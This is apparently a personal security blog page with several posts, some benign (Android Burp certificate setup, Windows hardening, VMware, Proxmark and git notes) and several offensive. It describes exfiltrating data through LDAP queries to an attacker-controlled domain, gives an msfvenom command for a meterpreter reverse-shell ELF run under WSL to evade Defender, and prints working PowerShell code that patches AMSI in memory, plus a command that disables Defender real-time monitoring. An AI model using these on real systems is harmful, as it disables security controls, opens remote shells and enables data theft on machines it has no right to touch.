Kazam

Just another vulnerable WordPress site

Setting up Burp Suite on Android 7/8/9/10

NOTE: You will need a rooted phone for this tutorial.

If you’ve recently tried to use Burp for Android versions Nougat or higher, you’ll know that many apps have simply stopped functioning through Burp.

Most notably, apps like the play store complain about not having internet, even though you can connect to HTTP sites and probably get a cert error going to HTTPS sites, but it still works.

Even after you resolve these errors by installing your certificate in the system store, HTTPS still will not function due to Burp’s cert having an invalid length of time.

The solution to this is to generate your own certificate, use the Android Debug Bridge utility to install it in your phone or emulator, and finally import the keystore into Burp so you can decrypt the traffic. You’ll need to have OpenSSL, ADB, and obviously Burp Suite installed to complete this tutorial. I recommend using Kali Linux and simply installing ADB with:

apt install adb -y

After you’ve installed ADB, you’re all set to start. Generate a new certificate and key pair using the following command:

openssl req -x509 -newkey rsa:2048 -keyout private.key -out public.cer -days 365
openssl pkcs12 -export -out pair.pfx -inkey private.key -in public.cer

Make sure to set a password on the key, and give the certificate an Organization Name. The password will be used when we import the key into Burp, and the Organization Name will be what shows once we have installed the cert in our Android device.

Now we have to format the cert correctly. Use the following command to get a hash of the certificate, and then run the second command using the output of the first command to rename it so Android will recognize it as a system cert.

openssl x509 -inform PEM -subject_hash_old -in public.cer | head -1
cp public.cer <INSERT_HASH_HERE>.0

We should now have four files, our original cert, our original private key, a pair of the two (.pfx), and our system cert.

Now we’re ready to install the certificate. If you’re using a VM, make sure that you’ve passed the USB connection through to your virtual machine. Also make sure that the device has “USB debugging mode” enabled from the developer settings.

I’m using Nox player for this example. Nox easily allows you to enable root, and then do adb connect 127.0.0.1:62001 to talk to the emulator.

If you’re using a physical device, use adb devices to ensure that your device is attached properly, then use adb root to connect to it for a root shell. If you have a consumer device that doesn’t allow you to use root, you can still perform these steps as long as your device is rooted and you can su into a root shell from an unprivileged shell.

Now that we’re this far, you’re going to want to get into your root shell and perform the following commands

adb shell
mount -o rw,remount,rw /system
exit
adb push <SYSTEM CERT> /system/etx/security/cacerts/<SYSTEM CERT>
adb shell
chmod 644 /system/etx/security/cacerts/<SYSTEM CERT>

Last step!
Within the Burp Suite proxy options, import the PKCS12 keystore using the file and password you generated earlier.

If all went well, you should start seeing traffic appear 🙂

https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/

An LDAP Exfil Technique

Recently I’ve been looking a lot at data exfiltration techniques in general, especially techniques that allow you to bypass network access controls and escape from PCI environments.

I recently discovered a little trick that you can use to traverse network boundaries and obfuscate the source of your data via LDAP, which means that as long as the environment uses active directory and there’s a device (such as a primary domain controller) that has the ability to cross network boundaries, you can leverage this technique to use any Windows box as a proxy between two boxes you control.

The idea goes like this — almost all windows boxes expose their IPC$ share over SMB, which doesn’t actually allow access to files but instead call specific methods from that machine. Among other things, this allows us to query a domain for a user. Not just the domain that the machine is joined to, but any domain. Simply put, we kindly ask the target to query a fake domain (set up by the attacker) to query for a specific user containing our data to be exfiltrated.

The mechanics of this are as follows:
1. Query a target for User: Data and Domain: ATTACKER.COM
2. Target issues a DNS SRV request for _ldap._tcp.SCF._sites.dc._msdcs.ATTACKER.COM
3. If ATTACKER.COM replied correctly, Target issues a CLDAP request to port 389 containing the data we have specified.

There’s a second, bonus technique here that we can use this to obfuscate the source of our DNS exfiltration, as the requests will look like they’re coming from our target.

I’ve successfully tested this technique and works well. The only issues arise when UDP traffic is blocked, as the request will come out as a UDP CLDAP packet, or when the DNS has issues. I might post my PoC code for replying properly with a SRV record if there’s interest. 

This was heavily inspired by Reino Mostert’s post a couple years back about Null Session attacks. This attack is possible where Null Session attacks are possible, but also since this is an exfiltration technique we can assume we’ve compromised domain credentials and perform the technique with those instead, which would make this technique blend in a little bit more and opens up the scope.

Another quick note is that this tecnique could be used for two-way communications since it allows for a response by the domain controller. C2?

Bypassing Windows Defender with the Windows Subsystem for Linux!

After watching BHIS’s Sacred Cash Cow Tipping 2020 I was inspired to try out a few of the techniques BHIS demo’d, and this is a pretty fun and odd one.

There’s a few issues with WSL that make it a really poor choice for hacking without some configurations. The interesting one here is that WSL does not use VHDs or emulate linux filesystems, in fact, you can navigate to %AppData%/Local/Packages/$LinuxDistro/LocalState/rootfs and interact with the entire filesystem.

This also means that every file you make/drop to WSL is scanned by Windows Defender. Don’t even try to install metasploit.

However, as BHIS points out, elf files are not scanned by Defender. So to test this, if you fire up a normal metasploit session and do a quick msfvenom -f elf -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 > payload.elf you can simply drop it to disk and run it through WSL. A shell comes back, no questions asked.

This is pretty cool and exciting and all, but there’s a few drawbacks. The first issue is that since you’re running from a linux payload and from within WSL, you can’t use typical metasploit windows goodies like priv and kiwi without first pivoting.

The other issue is that this technique has a lot of preconditions. You need to first have initial access obviously, but you also need the target to have WSL installed, with a linux distribution installed. This is not most workstations. Installing a linux distro into WSL requires you to first enable the WSL feature in Windows, then restart the machine, and finally install the distro of your choice. Steps 1 and 3 both require administrative privileges by default, so I don’t see a practical use-case unless you can somehow install WSL without admin or the machine is preconfigued.

It’s a very neat trick though, and runs all processes through WSL, which allows you to bypass application whitelisting as well.

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

“Turn off multicast name resolution” Enabled

Don’t need SMB? Turn it off

From Services.msc Disable and Stop “Server” AKA LanmanServer. Restart.

Need SMB but worried about Eternal Blue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false

 

Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to powershell with admin rights. For the record, I’m not sure if this will work on a domain joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistend and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
);
}
"@
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel, the exact code in his blog post no longer works because it contains “AmsiScanBuffer” but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open_vm_tools open_vm_tools_desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the bootloader, and if you have the same issue I did follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

sudo ./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github and clone it using the git address specified near the top of the page

git clone git@github.com:username/new_repo.gitg 
cd new_repo
git commit -m "First Commit!"

git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Overriding Windows TrustedInstaller Permissions

tl;dr
For a single file, all you have to do is:

takeown /F C:\FULL_PATH_TO_FILE
icacls C:\FULL_PATH_TO_FILE /grant Administrators:F

For an entire directory, it’s a bit longer:

takeown /F C:\FULL_PATH_TO_FOLDER
takeown /F C:\FULL_PATH_TO_FOLDER /r /d y
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Basically, this can be used to modify and overwrite Windows’s system files and other things you’re not supposed to touch. This can also be done from the GUI by assigning yourself to be the owner of the file, applying the change, closing the window, opening the permissions again, elevating to admin, and finally setting the permissions you would like.

Credit to Micah in the comments.

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2021 Kazam

Theme by Anders NorenUp ↑